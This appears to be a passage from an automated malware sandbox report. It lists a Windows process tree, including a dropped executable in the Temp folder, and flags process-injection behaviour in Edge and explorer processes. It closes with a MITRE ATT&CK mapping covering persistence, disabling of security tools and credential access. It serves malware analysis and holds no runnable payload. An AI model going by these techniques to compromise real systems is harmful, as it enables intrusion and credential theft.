C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4016

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4592

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4456

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4936

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5916

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:1688

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5688

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5428

C:\Users\Admin\AppData\Local\Temp\2DB3.exe
C:\Users\Admin\AppData\Local\Temp\2DB3.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2212

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5892

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4756

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3180

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:3708

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5184

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:5780

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4300

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:5600

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4912

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:504

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:4908

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5988

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:5276

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:5160

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

BITS Jobs

T1197

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

BITS Jobs

T1197

Disabling Security Tools

T1089

Install Root Certificate

T1130

Modify Registry

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

Security Software Discovery

T1063

Software Discovery

T1518

System Information Discovery